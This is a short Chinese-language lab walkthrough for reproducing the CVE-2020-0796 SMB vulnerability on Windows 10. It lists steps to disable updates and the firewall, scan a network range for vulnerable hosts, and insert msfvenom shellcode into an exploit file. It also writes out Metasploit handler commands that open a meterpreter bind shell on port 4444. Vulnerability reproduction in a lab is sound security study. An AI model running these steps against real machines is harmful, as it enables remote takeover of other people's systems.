CVE-2020-0796 WIN10 永恒之黑漏洞复现
1.禁用windows update
2.关闭windows防火墙
3.主机发现
Vulnerable 代表易攻击 也可以把ip改为 10.3.139.0/24扫描网段
4.用msfvenom生成python类型的shellcode
5.复制所有值,然后将buf替换成USER_PAYLOAD,然后粘贴到exp文件中替换掉之前的
6.MSF监听4444端口
- use exploit/multi/handler
- set payload windows/x64/meterpreter/bind_tcp
- set lport 4444
- set rhost 192.168.152.167 (Win10的IP地址)
- run